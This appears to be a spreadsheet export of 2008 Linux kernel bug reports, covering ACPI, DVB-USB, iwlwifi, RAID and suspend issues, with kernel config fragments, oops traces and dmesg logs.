not set # CONFIG_SCSI_SAS_LIBSAS is not set # # SCSI low-level drivers # # CONFIG_ISCSI_TCP is not set # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_AIC94XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_ARCMSR is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_MEGARAID_SAS is not set # CONFIG_SCSI_HPTIOP is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_STEX is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_QLA_FC is not set # CONFIG_SCSI_QLA_ISCSI is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # CONFIG_SCSI_SRP is not set # # PCMCIA SCSI adapter support # # CONFIG_PCMCIA_AHA152X is not set # CONFIG_PCMCIA_FDOMAIN is not set # CONFIG_PCMCIA_NINJA_SCSI is not set # CONFIG_PCMCIA_QLOGIC is not set # CONFIG_PCMCIA_SYM53C500 is not set # CONFIG_ATA is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # CONFIG_FUSION_SPI is not set # CONFIG_FUSION_FC is not set # CONFIG_FUSION_SAS is not set # # IEEE 1394 (FireWire) support # # CONFIG_FIREWIRE is not set # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # CONFIG_MACINTOSH_DRIVERS is not set # # Network device support # CONFIG_NETDEVICES=y CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set CONFIG_TUN=m # CONFIG_NET_SB1000 is not set # CONFIG_ARCNET is not set # CONFIG_PHYLIB is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_CASSINI is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_FORCEDETH is not set # CONFIG_DGRS is not set CONFIG_EEPRO100=m CONFIG_E100=m # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # CONFIG_SC92031 is not set # CONFIG_NET_POCKET is not set CONFIG_NETDEV_1000=y # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SKY2 is not set # CONFIG_SK98LIN is not set # CONFIG_VIA_VELOCITY is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # CONFIG_QLA3XXX is not set # CONFIG_ATL1 is not set CONFIG_NETDEV_10000=y # CONFIG_CHELSIO_T1 is not set # CONFIG_CHELSIO_T3 is not set # CONFIG_IXGB is not set # CONFIG_S2IO is not set # CONFIG_MYRI10GE is not set # CONFIG_NETXEN_NIC is not set # CONFIG_MLX4_CORE is not set # CONFIG_TR is not set # # Wireless LAN # # CONFIG_WLAN_PRE80211 is not set # CONFIG_WLAN_80211 is not set # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET_MII is not set CONFIG_USB_USBNET=m # CONFIG_USB_NET_AX8817X is not set CONFIG_USB_NET_CDCETHER=m # CONFIG_USB_NET_DM9601 is not set # CONFIG_USB_NET_GL620A is not set # CONFIG_USB_NET_NET1080 is not set # CONFIG_USB_NET_PLUSB is not set # CONFIG_USB_NET_MCS7830 is not set CONFIG_USB_NET_RNDIS_HOST=m CONFIG_USB_NET_CDC_SUBSET=m # CONFIG_USB_ALI_M5632 is not set # CONFIG_USB_AN2720 is not set # CONFIG_USB_BELKIN is not set CONFIG_USB_ARMLINUX=y # CONFIG_USB_EPSON2888 is not set # CONFIG_USB_KC2190 is not set # CONFIG_USB_NET_ZAURUS is not set CONFIG_NET_PCMCIA=y CONFIG_PCMCIA_3C589=m CONFIG_PCMCIA_3C574=m CONFIG_PCMCIA_FMVJ18X=m CONFIG_PCMCIA_PCNET=m CONFIG_PCMCIA_NMCLAN=m CONFIG_PCMCIA_SMC91C92=m CONFIG_PCMCIA_XIRC2PS=m CONFIG_PCMCIA_AXNET=m CONFIG_WAN=y # CONFIG_LANMEDIA is not set # CONFIG_HDLC is not set # CONFIG_DLCI is not set # CONFIG_SBNI is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPP_MPPE=m CONFIG_PPPOE=m # CONFIG_SLIP is not set CONFIG_SLHC=y # CONFIG_NET_FC is not set CONFIG_SHAPER=m # CONFIG_NETCONSOLE is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # CONFIG_INPUT_FF_MEMLESS is not set # CONFIG_INPUT_POLLDEV is not set # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_KEYBOARD_STOWAWAY is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y # CONFIG_MOUSE_PS2_TOUCHKIT is not set # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_APPLETOUCH is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TABLET is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=m # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y CONFIG_SERIO_RAW=m # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_VT_HW_CONSOLE_BINDING is not set # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=m CONFIG_SERIAL_8250_PCI=m CONFIG_SERIAL_8250_PNP=m # CONFIG_SERIAL_8250_CS is not set CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 CONFIG_SERIAL_8250_EXTENDED=y # CONFIG_SERIAL_8250_MANY_PORTS is not set CONFIG_SERIAL_8250_SHARE_IRQ=y CONFIG_SERIAL_8250_DETECT_IRQ=y # CONFIG_SERIAL_8250_RSA is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=m # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set CONFIG_WATCHDOG=y # CONFIG_WATCHDOG_NOWAYOUT is not set # # Watchdog Device Drivers # CONFIG_SOFT_WATCHDOG=m # CONFIG_ACQUIRE_WDT is not set # CONFIG_ADVANTECH_WDT is not set # CONFIG_ALIM1535_WDT is not set # CONFIG_ALIM7101_WDT is not set # CONFIG_SC520_WDT is not set # CONFIG_EUROTECH_WDT is not set # CONFIG_IB700_WDT is not set # CONFIG_IBMASR is not set # CONFIG_WAFER_WDT is not set # CONFIG_I6300ESB_WDT is not set # CONFIG_ITCO_WDT is not set # CONFIG_SC1200_WDT is not set # CONFIG_PC87413_WDT is not set # CONFIG_60XX_WDT is not set # CONFIG_SBC8360_WDT is not set # CONFIG_CPU5_WDT is not set # CONFIG_SMSC37B787_WDT is not set # CONFIG_W83627HF_WDT is not set # CONFIG_W83697HF_WDT is not set # CONFIG_W83877F_WDT is not set # CONFIG_W83977F_WDT is not set # CONFIG_MACHZ_WDT is not set # CONFIG_SBC_EPX_C3_WATCHDOG is not set # # PCI-based Watchdog Cards # # CONFIG_PCIPCWATCHDOG is not set # CONFIG_WDTPCI is not set # # USB-based Watchdog Cards # # CONFIG_USBPCWATCHDOG is not set # CONFIG_HW_RANDOM is not set CONFIG_NVRAM=m # CONFIG_RTC is not set # CONFIG_GEN_RTC is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set CONFIG_AGP=m # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=m # CONFIG_AGP_EFFICEON is not set CONFIG_DRM=m # CONFIG_DRM_TDFX is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_DRM_VIA is not set CONFIG_DRM_SAVAGE=m # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_CARDMAN_4000 is not set # CONFIG_CARDMAN_4040 is not set # CONFIG_MWAVE is not set # CONFIG_PC8736x_GPIO is not set # CONFIG_NSC_GPIO is not set # CONFIG_CS5535_GPIO is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HPET is not set # CONFIG_HANGCHECK_TIMER is not set # # TPM devices # # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set CONFIG_DEVPORT=y CONFIG_I2C=y CONFIG_I2C_BOARDINFO=y # CONFIG_I2C_CHARDEV is not set # # I2C Algorithms # CONFIG_I2C_ALGOBIT=y # CONFIG_I2C_ALGOPCF is not set # CONFIG_I2C_ALGOPCA is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_OCORES is</t>
  </si>
  <si>
    <t>GPE storm detected, kernel freezes</t>
  </si>
  <si>
    <t>2008-08-31 22:00 UTC</t>
  </si>
  <si>
    <t>George Gibbs</t>
  </si>
  <si>
    <t>2008-09-14 16:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26 Earliest failing kernel version:2.6.27-r5 (haven't tested earlier RC's yet) Distribution: Gentoo, using mainline kernel, not from gentoo repository. Hardware Environment: HP dv2225nr laptop. Nvidia chipset, turion x2, 2GB Software Environment: x86_64, gcc-4.3.1 Problem Description: At initial boot, kernel says: ACPI: EC: GPE storm detected, disabling EC GPE and then freezes. System does not boot. Adding 'acpi=off' fixes it. Steps to reproduce: 1. Compile kernel with ACPI 2. Boot to new kernel</t>
  </si>
  <si>
    <t>Kernel Oops loading DVB-USB driver</t>
  </si>
  <si>
    <t>2008-09-01 07:01 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: TS-7800 Software Environment: Debian Lenny Armel Problem Description: Kernel Oops loading DVB driver - probably USB or DVB-USB driver problem Steps to reproduce: Unload and load driver / VDR restart warning: `vdr-kbd' uses 32-bit capabilities (legacy support in use) Unable to handle kernel NULL pointer dereference at virtual address 00000000 pgd = c7bd0000 [00000000] *pgd=07b89031, *pte=00000000, *ppte=00000000 Internal error: Oops: 817 [#1] PREEMPT Modules linked in: ipv6 dvb_pll stv0299 dvb_usb_opera dvb_usb dvb_core CPU: 0 Not tainted (2.6.27-rc5 #1) PC is at dma_cache_maint+0x6c/0xa8 LR is at usb_hcd_submit_urb+0x544/0x954 pc : [&lt;c002feec&gt;] lr : [&lt;c021b604&gt;] psr: 20000013 sp : c7be7ca0 ip : c7be7cb0 fp : c7be7cac r10: c72777a8 r9 : c7b9fd08 r8 : c7286278 r7 : 00000020 r6 : c725e498 r5 : c723bf68 r4 : 3fc4a000 r3 : 00000000 r2 : 00000002 r1 : ffc4b000 r0 : ffc4a000 Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user Control: b005317f Table: 07bd0000 DAC: 00000015 Process vdr-kbd (pid: 1705, stack limit = 0xc7be6268) Stack: (0xc7be7ca0 to 0xc7be8000) 7ca0: c7be7d64 c7be7cb0 c021b604 c002fe90 00000000 000200d2 c03e3290 00000000 7cc0: c7be6000 60000013 00000000 00000000 c03e2ac8 c03e2ac8 c003a6e4 00000001 7ce0: c71bfbc0 000000d2 00000000 000000d2 c03e3284 000000ef c7be7d7c c7be7d08 7d00: c00785b0 c0077fac 00000001 00000044 c7ae5710 00000000 00000000 000200d2 7d20: c7be7d5c c7be7d30 c7be6000 00000000 00000001 00000010 00000001 c7282eb8 7d40: 00000200 c725e498 00000002 c7be7e70 c7b9fd08 c72777a8 c7be7d8c c7be7d68 7d60: c021bd54 c021b0d0 c7b9fd08 c7277a04 00000000 c7277a04 00000001 c7be7e70 7d80: c7be7dac c7be7d90 bf017cc4 c021bc68 c72776f4 00000001 c88f8000 00000001 7da0: c7be7dcc c7be7db0 bf017224 bf017ca0 00000000 c88f8000 c72777b4 c727798c 7dc0: c7be7ddc c7be7dd0 bf017304 bf01718c c7be7dfc c7be7de0 bf003fe8 bf017300 7de0: 00000000 c8a0c098 00000000 c727776c c7be7e3c c7be7e00 bf001d9c bf003f1c 7e00: bf000300 c0307078 00000001 00000000 c7be6000 bf0143e8 c7c27ca0 c8a0c0a0 7e20: c8a0c0d0 c8a0c098 c8a0c104 c7be7e70 c7be7e64 c7be7e40 bf002374 bf001b00 7e40: 0000003c 403c6f2b c7be7e70 41604cf4 00000000 c7c27ca0 c7be7f1c c7be7e68 7e60: bf0003c4 bf001f8c c7be7ed8 00000001 004e0012 00000000 00000000 00000000 7e80: 00fe0000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 7ea0: 00000000 00000000 00000004 71149b17 c7be7ee4 c7be7ec0 c003b06c c01753d0 7ec0: 00000000 c71bfbf0 c7c71ac0 00001000 c72ab000 00001000 c72ab000 c72ab000 7ee0: c0099fbc c0096ca8 c78097a0 c72ab000 c7be7f3c c7b9fd08 41604cf4 403c6f2b 7f00: c7b9fd08 c0029ec8 c7be6000 00000000 c7be7f34 c7be7f20 bf0011c0 bf000344 7f20: bf001f7c 41604cf4 c7be7f54 c7be7f38 c00a97d4 bf0011b4 c00974e4 c7c27ca0 7f40: c7b9fd08 41604cf4 c7be7f7c c7be7f58 c00a9854 c00a9758 c009d158 c003bbf4 7f60: 00000009 41604cf4 403c6f2b c7b9fd08 c7be7fa4 c7be7f80 c00a9b28 c00a97f4 7f80: 00000005 00000001 41604cf4 00000000 00000009 00000036 00000000 c7be7fa8 7fa0: c0029d20 c00a9af8 41604cf4 00000000 00000009 403c6f2b 41604cf4 00000004 7fc0: 41604cf4 00000000 00000009 00000036 0000004e 00000000 000000fe 41605dfc 7fe0: 00000012 41603ce0 0006159c 403860cc 80000010 00000009 00515031 00515431 Backtrace: [&lt;c002fe80&gt;] (dma_cache_maint+0x0/0xa8) from [&lt;c021b604&gt;] (usb_hcd_submit_urb+0x544/0x954) [&lt;c021b0c0&gt;] (usb_hcd_submit_urb+0x0/0x954) from [&lt;c021bd54&gt;] (usb_submit_urb+0xfc/0x254) [&lt;c021bc58&gt;] (usb_submit_urb+0x0/0x254) from [&lt;bf017cc4&gt;] (usb_urb_submit+0x34/0x84 [dvb_usb]) r8:c7be7e70 r7:00000001 r6:c7277a04 r5:00000000 r4:c7277a04 [&lt;bf017c90&gt;] (usb_urb_submit+0x0/0x84 [dvb_usb]) from [&lt;bf017224&gt;] (dvb_usb_ctrl_feed+0xa8/0x15c [dvb_usb]) r7:00000001 r6:c88f8000 r5:00000001 r4:c72776f4 [&lt;bf01717c&gt;] (dvb_usb_ctrl_feed+0x0/0x15c [dvb_usb]) from [&lt;bf017304&gt;] (dvb_usb_start_feed+0x14/0x18 [dvb_usb]) r7:c727798c r6:c72777b4 r5:c88f8000 r4:00000000 [&lt;bf0172f0&gt;] (dvb_usb_start_feed+0x0/0x18 [dvb_usb]) from [&lt;bf003fe8&gt;] (dmx_section_feed_start_filtering+0xdc/0x1a0 [dvb_core]) [&lt;bf003f0c&gt;] (dmx_section_feed_start_filtering+0x0/0x1a0 [dvb_core]) from [&lt;bf001d9c&gt;] (dvb_dmxdev_filter_start+0x2ac/0x48c [dvb_core]) r7:c727776c r6:00000000 r5:c8a0c098 r4:00000000 [&lt;bf001af0&gt;] (dvb_dmxdev_filter_start+0x0/0x48c [dvb_core]) from [&lt;bf002374&gt;] (dvb_demux_do_ioctl+0x3f8/0x460 [dvb_core]) r8:c7be7e70 r7:c8a0c104 r6:c8a0c098 r5:c8a0c0d0 r4:c8a0c0a0 [&lt;bf001f7c&gt;] (dvb_demux_do_ioctl+0x0/0x460 [dvb_core]) from [&lt;bf0003c4&gt;] (dvb_usercopy+0x90/0x178 [dvb_core]) [&lt;bf000334&gt;] (dvb_usercopy+0x0/0x178 [dvb_core]) from [&lt;bf0011c0&gt;] (dvb_demux_ioctl+0x1c/0x28 [dvb_core]) [&lt;bf0011a4&gt;] (dvb_demux_ioctl+0x0/0x28 [dvb_core]) from [&lt;c00a97d4&gt;] (vfs_ioctl+0x8c/0x9c) [&lt;c00a9748&gt;] (vfs_ioctl+0x0/0x9c) from [&lt;c00a9854&gt;] (do_vfs_ioctl+0x70/0x304) r6:41604cf4 r5:c7b9fd08 r4:c7c27ca0 [&lt;c00a97e4&gt;] (do_vfs_ioctl+0x0/0x304) from [&lt;c00a9b28&gt;] (sys_ioctl+0x40/0x68) r7:c7b9fd08 r6:403c6f2b r5:41604cf4 r4:00000009 [&lt;c00a9ae8&gt;] (sys_ioctl+0x0/0x68) from [&lt;c0029d20&gt;] (ret_fast_syscall+0x0/0x2c) r7:00000036 r6:00000009 r5:00000000 r4:41604cf4 Code: e593f020 e89da800 e3a03000 e3520001 (e5833000) ---[ end trace f185e517eaebeb12 ]---</t>
  </si>
  <si>
    <t>Intel 5100AGN (iwlwifi) doesn't load firmware properlly on x86_64</t>
  </si>
  <si>
    <t>2008-09-02 00:56 UTC</t>
  </si>
  <si>
    <t>Claudio M. Camacho</t>
  </si>
  <si>
    <t>2008-09-06 15:12 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.27-rc3 Distribution: Debian Sid (amd64) Hardware Environment: Sony Vaio SR11M, P8400 processor, 4GB RAM, Intel ProWireless 5100AGN Software Environment: Linux 2.6.27-rc5 x86_64, Debian-amd64 Sid, /lib/firmware/iwlwifi-5000-1.ucode Problem Description: Even though the kernel says that the firmware was loaded properly and the Intel 5100AGN card is recognized (iwconfig will show 'fake' info about the ethernet device), the card doesn't associate to any network, it cannot be used to search networks (iwlist wlan0 scan gives: 'No scan results') Steps to reproduce: ~# ifconfig wlan0 up ~# echo "0" &gt; /sys/class/net/wlan0/device/rfkill/rfkill0/state ~# cat /sys/class/net/wlan0/device/version This will show the message: 'fw not loaded' Output of dmesg is the following: iwlagn: Intel(R) Wireless WiFi Link AGN driver for Linux, 1.3.27ks iwlagn: Copyright(c) 2003-2008 Intel Corporation iwlagn 0000:04:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 iwlagn 0000:04:00.0: setting latency timer to 64 iwlagn: Detected Intel Wireless WiFi Link 5100AGN REV=0x54 iwlagn: Tunable channels: 13 802.11bg, 24 802.11a channels iwlagn 0000:04:00.0: PCI INT A disabled phy0: Selected rate control algorithm 'iwl-agn-rs' iwlagn 0000:04:00.0: enabling device (0000 -&gt; 0002) iwlagn 0000:04:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 iwlagn 0000:04:00.0: restoring config space at offset 0xf (was 0x100, writing 0x10b) iwlagn 0000:04:00.0: restoring config space at offset 0x4 (was 0x4, writing 0xd1900004) iwlagn 0000:04:00.0: restoring config space at offset 0x3 (was 0x0, writing 0x10) iwlagn 0000:04:00.0: restoring config space at offset 0x1 (was 0x100002, writing 0x100006) firmware: requesting iwlwifi-5000-1.ucode iwlagn: Radio disabled by HW RF Kill switch iwlagn: WARNING: Requesting MAC access during RFKILL wakes up NIC</t>
  </si>
  <si>
    <t>Brightness function keys do not work when acpi is enabled on Gateway m-1624</t>
  </si>
  <si>
    <t>2.6.24-19</t>
  </si>
  <si>
    <t>2008-09-02 05:49 UTC</t>
  </si>
  <si>
    <t>Kojo Gambrah-Sampaney</t>
  </si>
  <si>
    <t>2008-10-16 17:09 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:n/a Earliest failing kernel version:2.6.24-16 Distribution:Ubuntu Hardy Heron 8.04.1 Hardware Environment:Gateway m-1624 00:00.0 Host bridge: ATI Technologies Inc RS690 Host Bridge 00:01.0 PCI bridge: ATI Technologies Inc RS690 PCI to PCI Bridge (Internal gfx) 00:02.0 PCI bridge: ATI Technologies Inc RS690 PCI to PCI Bridge (PCI Express Graphics Port 0) 00:04.0 PCI bridge: ATI Technologies Inc Unknown device 7914 00:05.0 PCI bridge: ATI Technologies Inc RS690 PCI to PCI Bridge (PCI Express Port 1) 00:06.0 PCI bridge: ATI Technologies Inc RS690 PCI to PCI Bridge (PCI Express Port 2) 00:07.0 PCI bridge: ATI Technologies Inc RS690 PCI to PCI Bridge (PCI Express Port 3) 00:12.0 SATA controller: ATI Technologies Inc SB600 Non-Raid-5 SATA 00:13.0 USB Controller: ATI Technologies Inc SB600 USB (OHCI0) 00:13.1 USB Controller: ATI Technologies Inc SB600 USB (OHCI1) 00:13.2 USB Controller: ATI Technologies Inc SB600 USB (OHCI2) 00:13.3 USB Controller: ATI Technologies Inc SB600 USB (OHCI3) 00:13.4 USB Controller: ATI Technologies Inc SB600 USB (OHCI4) 00:13.5 USB Controller: ATI Technologies Inc SB600 USB Controller (EHCI) 00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 14) 00:14.1 IDE interface: ATI Technologies Inc SB600 IDE 00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia 00:14.3 ISA bridge: ATI Technologies Inc SB600 PCI to LPC Bridge 00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:05.0 VGA compatible controller: ATI Technologies Inc RS690M [Radeon X1200 Series] 01:05.2 Audio device: ATI Technologies Inc Radeon X1200 Series Audio Controller 07:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8101E PCI Express Fast Ethernet controller (rev 01) Software Environment:Gnome Desktop Problem Description: Brightness function keys work before Linux is loaded. For example, it works in GRUB Steps to reproduce:</t>
  </si>
  <si>
    <t>22bb1be4 (wext sysfsdeprecation) fooled me into borking my networkmanager setup</t>
  </si>
  <si>
    <t>after linux-2.6.27-rc5 ( bef69ea0 )</t>
  </si>
  <si>
    <t>2008-09-02 06:09 UTC</t>
  </si>
  <si>
    <t>2008-09-02 12:11 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 22bb1be4^ Earliest failing kernel version: 22bb1be4 Distribution: gentoo Hardware Environment: thinkpadr61,iwl3945 Software Environment: Problem Description: make oldconfig fooled me into pressing 'n' because of: "Say Y if you have programs using it (we don't know of any)." well... hal and/or networkmanager are obviously the ones i should have known of... this did cost me 20 minutes of my live... *hmpf* Steps to reproduce: upgrading config from 22bb1be4^ to bef69ea0 via make oldconfig</t>
  </si>
  <si>
    <t>Suspend/Resume prevent kernel reboot</t>
  </si>
  <si>
    <t>2008-09-02 08:26 UTC</t>
  </si>
  <si>
    <t>2008-10-24 22:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: never Earliest failing kernel version: current Distribution: fedora9 Hardware Environment: notebook m3n Software Environment: fedora 9 Problem Description: after suspend/resume notebook prevent to reboot, i got full cpu usage and stuck after system "ready to reboot..." message. without suspend everything going fine. Steps to reproduce: suspend/resume try to reboot</t>
  </si>
  <si>
    <t>MD resync blocked for more than 120 seconds (with call trace)</t>
  </si>
  <si>
    <t>2008-09-02 11:20 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:43 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.18 Earliest failing kernel version: 2.6.26 (haven't test others) Distribution: Debian 5.0 Hardware Environment: x86 (AMD Duron 800) Software Environment: Linux x86 Problem Description: I played around a little with one of my systems which has 2 harddrives with several RAID1 MD partitions which looks like this: Personalities : [raid1] md4 : active raid1 sdb8[0] sda8[1] 470945344 blocks [2/2] [UU] md3 : active raid1 sdb7[0] sda7[1] 10008384 blocks [2/2] [UU] md2 : active raid1 sdb6[0] sda6[1] 1003904 blocks [2/2] [UU] md1 : active raid1 sdb5[0] sda5[1] 2008000 blocks [2/2] [UU] md0 : active raid1 sdb1[0] sda1[1] 3911680 blocks [2/2] [UU] Whenever I remove one drive (either sda or sdb) and add a new harddrive and resync all MD partitions, after a while the kernel log shows: 84.982323] md: bind&lt;sdb1&gt; [ 85.009239] RAID1 conf printout: [ 85.009239] --- wd:1 rd:2 [ 85.009239] disk 0, wo:1, o:1, dev:sdb1 [ 85.009239] disk 1, wo:0, o:1, dev:sda1 [ 85.009239] md: recovery of RAID array md0 [ 85.009239] md: minimum _guaranteed_ speed: 1000 KB/sec/disk. [ 85.009239] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for recovery. [ 85.009239] md: using 128k window, over a total of 3911680 blocks. [ 85.238283] md: bind&lt;sdb5&gt; [ 85.516136] RAID1 conf printout: [ 85.516143] --- wd:1 rd:2 [ 85.516146] disk 0, wo:1, o:1, dev:sdb5 [ 85.516149] disk 1, wo:0, o:1, dev:sda5 [ 85.518888] md: delaying recovery of md1 until md0 has finished (they share one or more physical units) [ 86.036929] md: bind&lt;sdb6&gt; [ 86.292005] RAID1 conf printout: [ 86.292005] --- wd:1 rd:2 [ 86.292005] disk 0, wo:1, o:1, dev:sdb6 [ 86.292005] disk 1, wo:0, o:1, dev:sda6 [ 86.292005] md: delaying recovery of md2 until md1 has finished (they share one or more physical units) [ 86.973023] md: bind&lt;sdb7&gt; [ 87.241113] RAID1 conf printout: [ 87.241113] --- wd:1 rd:2 [ 87.241113] disk 0, wo:1, o:1, dev:sdb7 [ 87.241113] disk 1, wo:0, o:1, dev:sda7 [ 87.268655] md: delaying recovery of md3 until md2 has finished (they share one or more physical units) [ 87.268683] md: delaying recovery of md1 until md2 has finished (they share one or more physical units) [ 87.268690] md: delaying recovery of md2 until md0 has finished (they share one or more physical units) [ 87.268695] md: delaying recovery of md3 until md2 has finished (they share one or more physical units) [ 87.671634] md: 